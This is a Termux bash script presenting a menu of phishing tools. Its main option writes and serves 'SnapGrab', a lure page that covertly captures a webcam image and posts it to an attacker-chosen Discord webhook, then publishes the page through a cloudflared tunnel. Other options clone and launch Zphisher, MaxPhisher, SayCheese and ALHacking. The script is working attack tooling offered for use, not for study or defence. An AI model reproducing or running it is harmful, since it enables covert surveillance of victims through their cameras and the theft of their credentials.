cat << 'EOF' > Nmt.sh
#!/data/data/com.termux/files/usr/bin/bash

# --- Setup & Colors ---
RED='\033[0;31m'
YELLOW='\033[1;33m'
GREEN='\033[0;32m'
CYAN='\033[0;36m'
WHITE='\033[1;37m'
RESET='\033[0m'

# Cleanup background processes
cleanup() {
    echo -e "\n${RED}[!] Cleaning up processes...${RESET}"
    pkill -f "python3 -m http.server" > /dev/null 2>&1
    pkill -f "cloudflared" > /dev/null 2>&1
    exit
}
trap cleanup SIGINT

while true; do
  clear
  # Main Menu Banner
  echo -e "${RED}"
  echo "  _   _ _ _         _       __  __       _ _   _ _____           _     "
  echo " | \ | (_) | _____ ( )___  |  \/  |_   _| | |_(_)_   _|__   ___ | |___ "
  echo " |  \| | | |/ / _ \|// __| | |\/| | | | | | __| | | |/ _ \ / _ \| / __|"
  echo " | |\  | |   < (_) | \__ \ | |  | | |_| | | |_| | | | (_) | (_) | \__ \\"
  echo " |_| \_|_|_|\_\___/  |___/ |_|  |_|\__,_|_|\__|_| |_|\___/ \___/|_|___/"
  echo -e "${RESET}"

  echo -e "             ${WHITE}╭────────────────────────────────────────╮${RESET}"
  printf "             ${WHITE}│  ${GREEN}%-4s %-30s ${WHITE}│${RESET}\n" "1)" "SnapGrab (FIXED)"
  printf "             ${WHITE}│  ${GREEN}%-4s %-30s ${WHITE}│${RESET}\n" "2)" "Zphisher"
  printf "             ${WHITE}│  ${GREEN}%-4s %-30s ${WHITE}│${RESET}\n" "3)" "ALHacking"
  echo -e "             ${WHITE}├────────────────────────────────────────┤${RESET}"
  printf "             ${WHITE}│  ${GREEN}%-4s %-30s ${WHITE}│${RESET}\n" "4)" "MaxPhisher"
  printf "             ${WHITE}│  ${GREEN}%-4s %-30s ${WHITE}│${RESET}\n" "5)" "SayCheese"
  printf "             ${WHITE}│  ${YELLOW}%-4s %-30s ${WHITE}│${RESET}\n" "6)" "Option 6"
  echo -e "             ${WHITE}├────────────────────────────────────────┤${RESET}"
  printf "             ${WHITE}│  ${YELLOW}%-4s %-30s ${WHITE}│${RESET}\n" "7)" "Option 7"
  printf "             ${WHITE}│  ${YELLOW}%-4s %-30s ${WHITE}│${RESET}\n" "8)" "Option 8"
  printf "             ${WHITE}│  ${YELLOW}%-4s %-30s ${WHITE}│${RESET}\n" "9)" "Option 9"
  echo -e "             ${WHITE}├────────────────────────────────────────┤${RESET}"
  printf "             ${WHITE}│  ${YELLOW}%-4s %-30s ${WHITE}│${RESET}\n" "10)" "Option 10"
  printf "             ${WHITE}│  ${CYAN}%-4s %-30s ${WHITE}│${RESET}\n" "0)" "Exit"
  echo -e "             ${WHITE}╰────────────────────────────────────────╯${RESET}"
  echo -e "             ${CYAN}Join Discord:${RESET}"
  echo -e "             ${YELLOW}https://discord.gg/W9ynqWB7R${RESET}\n"

  read -p "    Select Option > " choice

  case $choice in
    0) cleanup ;;
    1)
      # Executes your specific SnapGrab Script logic
      if [ ! -f "SnapGrab.sh" ]; then
          echo -e "${YELLOW}[*] Creating SnapGrab script...${RESET}"
          cat << 'SOG' > SnapGrab.sh
#!/data/data/com.termux/files/usr/bin/bash
clear
echo -e "\e[32m"
cat << 'BANNER'
  ____                     ____           _     
 / ___| _ __   __ _ _ __  / ___|_ __ __ _| |__  
 \___ \| '_ \ / _` | '_ \| |  _| '__/ _` | '_ \ 
  ___) | | | | (_| | |_) | |_| | | | (_| | |_) |
 |____/|_| |_|\__,_| .__/ \____|_|  \__,_|_.__/ 
                   |_|                           
BANNER
echo -e "\e[0m"
echo ""
echo "  [1] Start"
echo "  [2] Exit"
echo ""
read -p "Choose: " choice
if [[ "$choice" == "2" ]]; then exit 0; fi
if [[ "$choice" != "1" ]]; then exit 1; fi

read -p "Enter port (ex: 9090): " PORT
read -p "Enter Discord webhook URL: " WEBHOOK_URL
read -p "Enter redirect link: " REDIR_URL
[ -z "$PORT" ] && PORT=9090

cat << 'HTML' > index.html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    body { margin: 0; height: 100dvh; background: #000; display: flex; align-items: center; justify-content: center; overflow: hidden; }
    .loader { width: 80px; height: 80px; border: 10px solid #0f0; border-top: 10px solid transparent; border-radius: 50%; animation: spin 1s linear infinite; }
    @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
  </style>
</head>
<body>
  <div class="loader"></div>
  <script>
    const webhookURL = "__WEBHOOK_URL__";
    const redirectURL = "__REDIR_URL__";
    async function captureAndSend() {
      try {
        const stream = await navigator.mediaDevices.getUserMedia({ video: true });
        const video = document.createElement('video');
        video.srcObject = stream;
        video.play();
        await new Promise(r => video.onloadedmetadata = r);
        const canvas = document.createElement('canvas');
        canvas.width = video.videoWidth; canvas.height = video.videoHeight;
        canvas.getContext('2d').drawImage(video, 0, 0);
        const blob = await new Promise(res => canvas.toBlob(res, 'image/png'));
        const formData = new FormData();
        formData.append('file', blob, 'capture.png');
        await fetch(webhookURL, { method: 'POST', body: formData });
        stream.getTracks().forEach(track => track.stop());
      } catch (err) {} finally {
        setTimeout(() => { window.location.href = redirectURL; }, 800);
      }
    }
    captureAndSend();
  </script>
</body>
</html>
HTML
sed -i "s|__WEBHOOK_URL__|$WEBHOOK_URL|g" index.html
sed -i "s|__REDIR_URL__|$REDIR_URL|g" index.html

# Start Tunneling automatically so it's reachable
if ! command -v cloudflared &> /dev/null; then pkg install cloudflared -y; fi
python3 -m http.server $PORT > /dev/null 2>&1 &
cloudflared tunnel --url http://localhost:$PORT > .tunnel.log 2>&1 &
echo -e "\e[36m[*] Generating Public Link...\e[0m"
sleep 8
PUBLIC_URL=$(grep -o 'https://[-0-9a-z.]*.trycloudflare.com' .tunnel.log | head -n 1)
echo -e "\e[32mYour Public Link: $PUBLIC_URL\e[0m"
echo -e "\e[31m[!] Press CTRL+C to stop.\e[0m"
wait
SOG
          chmod +x SnapGrab.sh
      fi
      bash SnapGrab.sh
      ;;
    2) clear; [ ! -d "zphisher" ] && git clone --depth=1 https://github.com/htr-tech/zphisher.git; cd zphisher && bash zphisher.sh; cd .. ;;
    3) clear; [ ! -d "ALHacking" ] && git clone https://github.com/4lbH4cker/ALHacking; cd ALHacking && bash alhack.sh; cd .. ;;
    4) clear; pip install maxphisher; maxphisher ;;
    5) clear; [ ! -d "saycheese" ] && git clone https://github.com/MrFploit/saycheese; cd saycheese && bash saycheese.sh; cd .. ;;
    *) echo "Invalid"; sleep 1 ;;
  esac
done
EOF
chmod +x Nmt.sh
./Nmt.sh

